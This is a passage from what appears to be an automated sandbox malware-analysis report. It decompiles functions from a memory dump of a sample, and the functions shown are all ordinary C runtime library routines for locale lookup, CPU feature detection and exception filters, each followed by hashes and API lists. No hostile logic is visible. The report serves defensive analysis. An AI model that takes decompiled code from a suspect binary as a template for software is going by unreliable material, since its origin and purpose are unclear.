                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D35
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D4A
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D77
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D8C
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DA4
                • ___getlocaleinfo.LIBCMT ref: 00EB85F0
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DE4
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4E0E
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4E34
                  • Part of subcall function 00EB4CB1: __invoke_watson.LIBCMT ref: 00EB4E84
                • ___getlocaleinfo.LIBCMT ref: 00EB8607
                • ___getlocaleinfo.LIBCMT ref: 00EB861E
                • ___getlocaleinfo.LIBCMT ref: 00EB863B
                • ___getlocaleinfo.LIBCMT ref: 00EB8652
                • ___getlocaleinfo.LIBCMT ref: 00EB8669
                • ___getlocaleinfo.LIBCMT ref: 00EB8680
                • ___getlocaleinfo.LIBCMT ref: 00EB869A
                • ___getlocaleinfo.LIBCMT ref: 00EB86B1
                • ___getlocaleinfo.LIBCMT ref: 00EB86C8
                • ___getlocaleinfo.LIBCMT ref: 00EB86DF
                • ___getlocaleinfo.LIBCMT ref: 00EB86F9
                • ___getlocaleinfo.LIBCMT ref: 00EB8710
                • ___getlocaleinfo.LIBCMT ref: 00EB8727
                • ___getlocaleinfo.LIBCMT ref: 00EB873E
                • ___getlocaleinfo.LIBCMT ref: 00EB8758
                • ___getlocaleinfo.LIBCMT ref: 00EB876F
                • ___getlocaleinfo.LIBCMT ref: 00EB8786
                • ___getlocaleinfo.LIBCMT ref: 00EB879D
                • ___getlocaleinfo.LIBCMT ref: 00EB87B7
                • _free.LIBCMT ref: 00EB87CD
                  • Part of subcall function 00EB2248: HeapFree.KERNEL32(00000000,00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB225C
                  • Part of subcall function 00EB2248: GetLastError.KERNEL32(00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB226E
                • _free.LIBCMT ref: 00EB87D6
                • _free.LIBCMT ref: 00EB87DF
                • _free.LIBCMT ref: 00EB88A0
                • _free.LIBCMT ref: 00EB88A8
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8448
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB845A
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB846C
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB847E
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8490
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84A2
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84B4
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84C6
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84D8
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84EA
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84FC
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB850E
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8520
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ___getlocaleinfo_free$InfoLocale___crt__calloc_crt$ErrorLast$FreeHeap__invoke_watson
                • String ID:
                • API String ID: 129311744-0
                • Opcode ID: e8807c014097cdb2faa6682f409b6bd3796282197e566080f324ed0dba5fe8c3
                • Instruction ID: 5e4805bc4c9095b39d420b9809d2b337096e8ce33fadad232659a6ba9724dcb7
                • Opcode Fuzzy Hash: e8807c014097cdb2faa6682f409b6bd3796282197e566080f324ed0dba5fe8c3
                • Instruction Fuzzy Hash: 8061E3B2D402087AEB20DBA8CC46FEF7BEC9B09B85F145510FB04FB1C2D5A4DA549A65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA67B8 Relevance: 30.2, APIs: 20, Instructions: 187COMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E00EA67B8(void* __eax, void* __ebx, void* __edi, signed int __esi) {
				char _t130;
				void* _t144;
				void* _t157;
				void* _t162;
				char* _t167;
				intOrPtr* _t170;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t189;
				char* _t191;
				void* _t192;
				void* _t193;

				_t157 = __ebx;
				asm("sbb [edi-0x73], dl");
				_t193 = _t192 + 1;
				asm("in al, dx");
				_push(1);
				_t173 = __esi | E00EB4CB1(__ebx, __edi, __esi);
				_t174 = _t173 | E00EB4CB1(__ebx, __edi, _t173, _t193 - 0x14, 1, __edi, 0x50,  *((intOrPtr*)(_t193 + 8)) + 0x20);
				_t175 = _t174 | E00EB4CB1(__ebx, __edi, _t174, _t193 - 0x14, 1, __edi, 0x51,  *((intOrPtr*)(_t193 + 8)) + 0x24);
				_t176 = _t175 | E00EB4CB1(__ebx, __edi, _t175, _t193 - 0x14, 0, __edi, 0x1a,  *((intOrPtr*)(_t193 + 8)) + 0x28);
				_t177 = _t176 | E00EB4CB1(__ebx, __edi, _t176, _t193 - 0x14, 0, __edi, 0x19,  *((intOrPtr*)(_t193 + 8)) + 0x29);
				_t178 = _t177 | E00EB4CB1(__ebx, __edi, _t177, _t193 - 0x14, 0, __edi, 0x54,  *((intOrPtr*)(_t193 + 8)) + 0x2a);
				_t179 = _t178 | E00EB4CB1(__ebx, __edi, _t178, _t193 - 0x14, 0, __edi, 0x55,  *((intOrPtr*)(_t193 + 8)) + 0x2b);
				_t180 = _t179 | E00EB4CB1(__ebx, __edi, _t179, _t193 - 0x14, 0, __edi, 0x56,  *((intOrPtr*)(_t193 + 8)) + 0x2c);
				_t181 = _t180 | E00EB4CB1(__ebx, __edi, _t180, _t193 - 0x14, 0, __edi, 0x57,  *((intOrPtr*)(_t193 + 8)) + 0x2d);
				_t182 = _t181 | E00EB4CB1(__ebx, __edi, _t181, _t193 - 0x14, 0, __edi, 0x52,  *((intOrPtr*)(_t193 + 8)) + 0x2e);
				_t183 = _t182 | E00EB4CB1(__ebx, __edi, _t182, _t193 - 0x14, 0, __edi, 0x53,  *((intOrPtr*)(_t193 + 8)) + 0x2f);
				_t184 = _t183 | E00EB4CB1(__ebx, __edi, _t183, _t193 - 0x14, 2, __edi, 0x15,  *((intOrPtr*)(_t193 + 8)) + 0x38);
				_t185 = _t184 | E00EB4CB1(__ebx, __edi, _t184, _t193 - 0x14, 2, __edi, 0x14,  *((intOrPtr*)(_t193 + 8)) + 0x3c);
				_t186 = _t185 | E00EB4CB1(__ebx, __edi, _t185, _t193 - 0x14, 2, __edi, 0x16,  *((intOrPtr*)(_t193 + 8)) + 0x40);
				_t187 = _t186 | E00EB4CB1(__ebx, __edi, _t186, _t193 - 0x14, 2, __edi, 0x17,  *((intOrPtr*)(_t193 + 8)) + 0x44);
				_t188 = _t187 | E00EB4CB1(__ebx, __edi, _t187, _t193 - 0x14, 2, __edi, 0x50,  *((intOrPtr*)(_t193 + 8)) + 0x48);
				if((E00EB4CB1(__ebx, __edi, _t188, _t193 - 0x14, 2, __edi, 0x51,  *((intOrPtr*)(_t193 + 8)) + 0x4c) | _t188) == 0) {
					_t167 =  *((intOrPtr*)( *((intOrPtr*)(_t193 - 0xc))));
					while( *_t167 != 0) {
						_t130 =  *_t167;
						if(_t130 < 0x30 || _t130 > 0x39) {
							if(_t130 != 0x3b) {
								goto L8;
							} else {
								_t191 = _t167;
								do {
									 *_t191 =  *((intOrPtr*)(_t191 + 1));
									_t191 = _t191 + 1;
								} while ( *_t191 != 0);
								continue;
							}
							L19:
							if( *((intOrPtr*)(_t157 + 0x78)) != 0) {
								asm("lock xadd [eax], ecx");
								if(_t162 == 1) {
									E00EB2248( *((intOrPtr*)(_t157 + 0x84)));
									E00EB2248( *((intOrPtr*)(_t157 + 0x78)));
								}
							}
							 *((intOrPtr*)(_t157 + 0x78)) =  *((intOrPtr*)(_t193 - 4));
							_t144 = 0;
							 *((intOrPtr*)(_t157 + 0x80)) = _t170;
							 *((intOrPtr*)(_t157 + 0x84)) = _t189;
							goto L23;
						} else {
							 *_t167 = _t130 - 0x30;
							L8:
							_t167 = _t167 + 1;
						}
					}
					_t189 =  *((intOrPtr*)(_t193 + 8));
					_t170 =  *((intOrPtr*)(_t193 - 8));
					 *_t189 =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84))));
					 *((intOrPtr*)(_t189 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84)) + 4));
					 *((intOrPtr*)(_t189 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84)) + 8));
					 *((intOrPtr*)(_t189 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84)) + 0x30));
					 *((intOrPtr*)(_t189 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84)) + 0x34));
					 *((intOrPtr*)( *((intOrPtr*)(_t193 - 4)))) = 1;
					if(_t170 != 0) {
						 *_t170 = 1;
					}
					_t162 = 0xffffffffffffffff;
					if( *((intOrPtr*)(_t157 + 0x80)) != 0) {
						asm("lock xadd [edx], eax");
					}
					goto L19;
				} else {
					E00EB842D( *((intOrPtr*)(_t193 + 8)));
					E00EB2248( *((intOrPtr*)(_t193 + 8)));
					E00EB2248( *((intOrPtr*)(_t193 - 4)));
					E00EB2248( *((intOrPtr*)(_t193 - 8)));
					_t144 = 1;
				}
				L23:
				return _t144;
			}





























                0x00ea67b8
                0x00eb8633
                0x00eb8636
                0x00eb8637
                0x00eb8638
                0x00eb8640
                0x00eb8657
                0x00eb866e
                0x00eb8688
                0x00eb869f
                0x00eb86b6
                0x00eb86cd
                0x00eb86e7
                0x00eb86fe
                0x00eb8715
                0x00eb872c
                0x00eb8746
                0x00eb875d
                0x00eb8774
                0x00eb878b
                0x00eb87a5
                0x00eb87c1
                0x00eb87ef
                0x00eb8802
                0x00eb87f3
                0x00eb87f7
                0x00eb880b
                0x00000000
                0x00eb880d
                0x00eb880d
                0x00eb880f
                0x00eb8812
                0x00eb8814
                0x00eb8817
                0x00000000
                0x00eb881c
                0x00eb888c
                0x00eb8891
                0x00eb8893
                0x00eb8898
                0x00eb88a0
                0x00eb88a8
                0x00eb88ae
                0x00eb8898
                0x00eb88b2
                0x00eb88b5
                0x00eb88b7
                0x00eb88bd
                0x00000000
                0x00eb87fd
                0x00eb87ff
                0x00eb8801
                0x00eb8801
                0x00eb8801
                0x00eb87f7
                0x00eb8833
                0x00eb8837
                0x00eb883c
                0x00eb8847
                0x00eb8853
                0x00eb885f
                0x00eb886b
                0x00eb8871
                0x00eb8875
                0x00eb8877
                0x00eb8877
                0x00eb887f
                0x00eb8884
                0x00eb8888
                0x00eb8888
                0x00000000
                0x00eb87c3
                0x00eb87c7
                0x00eb87cd
                0x00eb87d6
                0x00eb87df
                0x00eb8575
                0x00eb8575
                0x00eb88c3
                0x00eb88c9

                APIs
                • ___getlocaleinfo.LIBCMT ref: 00EB863B
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D03
                  • Part of subcall function 00EB4CB1: GetLastError.KERNEL32 ref: 00EB4D15
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D35
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D4A
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D77
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D8C
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DA4
                • ___getlocaleinfo.LIBCMT ref: 00EB8652
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DE4
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4E0E
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4E34
                  • Part of subcall function 00EB4CB1: __invoke_watson.LIBCMT ref: 00EB4E84
                • ___getlocaleinfo.LIBCMT ref: 00EB8669
                • ___getlocaleinfo.LIBCMT ref: 00EB8680
                • ___getlocaleinfo.LIBCMT ref: 00EB869A
                • ___getlocaleinfo.LIBCMT ref: 00EB86B1
                • ___getlocaleinfo.LIBCMT ref: 00EB86C8
                • ___getlocaleinfo.LIBCMT ref: 00EB86DF
                • ___getlocaleinfo.LIBCMT ref: 00EB86F9
                • ___getlocaleinfo.LIBCMT ref: 00EB8710
                • ___getlocaleinfo.LIBCMT ref: 00EB8727
                • ___getlocaleinfo.LIBCMT ref: 00EB873E
                • ___getlocaleinfo.LIBCMT ref: 00EB8758
                • ___getlocaleinfo.LIBCMT ref: 00EB876F
                • ___getlocaleinfo.LIBCMT ref: 00EB8786
                • ___getlocaleinfo.LIBCMT ref: 00EB879D
                • ___getlocaleinfo.LIBCMT ref: 00EB87B7
                • _free.LIBCMT ref: 00EB87CD
                  • Part of subcall function 00EB2248: HeapFree.KERNEL32(00000000,00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB225C
                  • Part of subcall function 00EB2248: GetLastError.KERNEL32(00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB226E
                • _free.LIBCMT ref: 00EB87D6
                • _free.LIBCMT ref: 00EB87DF
                • _free.LIBCMT ref: 00EB88A0
                • _free.LIBCMT ref: 00EB88A8
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8448
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB845A
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB846C
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB847E
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8490
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84A2
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84B4
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84C6
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84D8
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84EA
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84FC
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB850E
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8520
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$___getlocaleinfo$InfoLocale___crt__calloc_crt$ErrorLast$FreeHeap__invoke_watson
                • String ID:
                • API String ID: 3394113687-0
                • Opcode ID: d240112f6bff3548c84ae91326eacca9f9051ac118192e7e34800d04bc19bc67
                • Instruction ID: 4e27bb8dbb8a41178c9b287f7ee973b7f07c85956efb9cb5f382097c7850fe64
                • Opcode Fuzzy Hash: d240112f6bff3548c84ae91326eacca9f9051ac118192e7e34800d04bc19bc67
                • Instruction Fuzzy Hash: 0051F3B2D401087AEB20DBA8CC46FEB7BEC9B09B85F145510FB04FB1C2D5A0DA509A65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EBE8C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E00EBE8C3(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E00EBDB28(_t28, ?str?) != 0) {
					if(E00EBDB28(_t28, ?str?) != 0) {
						return E00EBEFC5(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}





                0x00ebe8c7
                0x00ebe8cc
                0x00ebe8f4
                0x00000000
                0x00ebe91d
                0x00ebe90f
                0x00ebe93b
                0x00000000
                0x00ebe93b
                0x00000000
                0x00ebe911
                0x00ebe939
                0x00000000
                0x00000000
                0x00ebe93f
                0x00ebe944
                0x00ebe948
                0x00ebe948
                0x00ebe916

                APIs
                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00EBEB89,?,00000000), ref: 00EBE907
                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00EBEB89,?,00000000), ref: 00EBE931
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: b4cb63a85889fdf2dfd0883e57899944b483b6d1a0fe0cde0f0eaeb73f6ba0ec
                • Instruction ID: bbd92ebf05956c3359fd9bc9f353d70a772304c51c54fc90144992672bc5ae30
                • Opcode Fuzzy Hash: b4cb63a85889fdf2dfd0883e57899944b483b6d1a0fe0cde0f0eaeb73f6ba0ec
                • Instruction Fuzzy Hash: D301B532208205BAEB509F15DC46FEB37DC9F44768F0054A5F909FA291E731EE85C791
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EB1D88 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E00EB1D88(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                0x00eb1d8d
                0x00eb1d9d

                APIs
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00EAEAB2,?,?,?,00000000), ref: 00EB1D8D
                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00EB1D96
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: 0312794fce4996316a88e5f992438d21feedb6d3b1ec70cff0f97cc26b54dacd
                • Instruction ID: fc03d86e289e27a429010c37a45b05536ad875fefc2fa51a54ef9de6c048e680
                • Opcode Fuzzy Hash: 0312794fce4996316a88e5f992438d21feedb6d3b1ec70cff0f97cc26b54dacd
                • Instruction Fuzzy Hash: 83B09231049208AFCB002B93EC09F4C3F28EB04652F0810A0FE4D540608B6354968E91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EB00A3 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E00EB00A3(intOrPtr __edx) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed char _v28;
				signed int _v32;
				intOrPtr _t40;
				signed char _t41;
				intOrPtr _t42;
				intOrPtr* _t43;
				signed int _t45;
				intOrPtr _t57;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr* _t62;
				signed int _t63;
				signed int _t66;
				signed int _t68;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				intOrPtr* _t74;

				_t60 = __edx;
				 *0xecf1f0 =  *0xecf1f0 & 0x00000000;
				 *0xece508 =  *0xece508 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				 *0xecf1f0 = 1;
				asm("cpuid");
				_t68 =  *0xece508; // 0x2f
				_t62 =  &_v32;
				_t69 = _t68 | 0x00000002;
				 *_t62 = 0;
				 *((intOrPtr*)(_t62 + 4)) = 1;
				 *((intOrPtr*)(_t62 + 8)) = 0;
				 *((intOrPtr*)(_t62 + 0xc)) = _t60;
				_v16 = _v32;
				 *0xece508 = _t69;
				asm("sbb cl, cl");
				_t40 = 1;
				_t57 = 0;
				asm("cpuid");
				 *_t62 = _t40;
				 *((intOrPtr*)(_t62 + 4)) = 1;
				 *((intOrPtr*)(_t62 + 8)) = _t57;
				 *((intOrPtr*)(_t62 + 0xc)) = _t60;
				_t58 = _v24;
				_v12 = _t58;
				if( ~(_v20 ^ 0x49656e69 | _v24 ^ 0x6c65746e | _v28 ^ 0x756e6547) + 1 == 0) {
					L9:
					_t63 =  *0xecf1f4; // 0x2
					L10:
					if(_v16 < 7) {
						_t41 = 0;
					} else {
						_t74 =  &_v32;
						_t42 = 7;
						asm("cpuid");
						 *_t74 = _t42;
						_t43 = _t74;
						_t69 =  *0xece508; // 0x2f
						 *((intOrPtr*)(_t43 + 4)) = 1;
						 *((intOrPtr*)(_t43 + 8)) = 0;
						_t58 = _v12;
						 *((intOrPtr*)(_t43 + 0xc)) = _t60;
						_t41 = _v28;
						if((_t41 & 0x00000200) != 0) {
							 *0xecf1f4 = _t63 | 0x00000002;
						}
					}
					if((_t58 & 0x00100000) != 0) {
						_t71 = _t69 | 0x00000004;
						 *0xecf1f0 = 2;
						 *0xece508 = _t71;
						if((_t58 & 0x08000000) != 0 && (_t58 & 0x10000000) != 0) {
							_t72 = _t71 | 0x00000008;
							 *0xecf1f0 = 3;
							 *0xece508 = _t72;
							if((_t41 & 0x00000020) != 0) {
								 *0xecf1f0 = 5;
								 *0xece508 = _t72 | 0x00000020;
							}
						}
					}
					goto L20;
				}
				_t45 = _v32 & 0x0fff3ff0;
				if(_t45 == 0x106c0 || _t45 == 0x20660 || _t45 == 0x20670 || _t45 == 0x30650 || _t45 == 0x30660 || _t45 == 0x30670) {
					_t66 =  *0xecf1f4; // 0x2
					_t63 = _t66 | 0x00000001;
					 *0xecf1f4 = _t63;
					goto L10;
				} else {
					goto L9;
				}
			}

























                0x00eb00a3
                0x00eb00a6
                0x00eb00b4
                0x00eb00c3
                0x00eb0215
                0x00eb021b
                0x00eb021b
                0x00eb00cb
                0x00eb00d3
                0x00eb00d6
                0x00eb00dd
                0x00eb00e0
                0x00eb00e3
                0x00eb00e5
                0x00eb00e8
                0x00eb00eb
                0x00eb00f4
                0x00eb0105
                0x00eb011b
                0x00eb011d
                0x00eb0122
                0x00eb0123
                0x00eb0125
                0x00eb0127
                0x00eb012a
                0x00eb012d
                0x00eb0130
                0x00eb0133
                0x00eb0136
                0x00eb017b
                0x00eb017b
                0x00eb0181
                0x00eb0185
                0x00eb01bc
                0x00eb0187
                0x00eb018b
                0x00eb018e
                0x00eb018f
                0x00eb0191
                0x00eb0193
                0x00eb0195
                0x00eb019b
                0x00eb019e
                0x00eb01a1
                0x00eb01a4
                0x00eb01a7
                0x00eb01af
                0x00eb01b4
                0x00eb01b4
                0x00eb01af
                0x00eb01c4
                0x00eb01c6
                0x00eb01c9
                0x00eb01d3
                0x00eb01df
                0x00eb01e9
                0x00eb01ec
                0x00eb01f6
                0x00eb01fe
                0x00eb0203
                0x00eb020d
                0x00eb020d
                0x00eb01fe
                0x00eb01df
                0x00000000
                0x00eb0214
                0x00eb013b
                0x00eb0145
                0x00eb016a
                0x00eb0170
                0x00eb0173
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00EB00BC
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: FeaturePresentProcessor
                • String ID:
                • API String ID: 2325560087-0
                • Opcode ID: 536be7379916429b6745b6c69862831ffee579e0d71f737760ee900af2a906f4
                • Instruction ID: 6ffc5fcb5abde260615e64b875075d7fa47ae3d8109b21c810f57c147c6319f6
                • Opcode Fuzzy Hash: 536be7379916429b6745b6c69862831ffee579e0d71f737760ee900af2a906f4
                • Instruction Fuzzy Hash: E9415FB1D02216CFE718CF5AD889BABBBE1FB44318F24907AD415F7261D775A845CB80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EB9FDB Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,00EB4E67,?,?,?,00000002), ref: 00EBA002
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID:
                • API String ID: 2299586839-0
                • Opcode ID: f3a1f4f019684161ad7636a6ddb7e4b5a1282735b0babfd3a97ebfa73c25a1b1
                • Instruction ID: f92027099c235cad5fda171a4a31d55a22571dc85fc23ec782141a790632aedf
                • Opcode Fuzzy Hash: f3a1f4f019684161ad7636a6ddb7e4b5a1282735b0babfd3a97ebfa73c25a1b1
                • Instruction Fuzzy Hash: DBD05E32004108BFCF019FE1FC09DBE3BA9FB08364F044811FA2CA6121D733A9609B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EB1D57 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00EB1D57(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}



                0x00eb1d64

                APIs
                • SetUnhandledExceptionFilter.KERNEL32(?,?,00EB0267,00EB021C), ref: 00EB1D5D
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
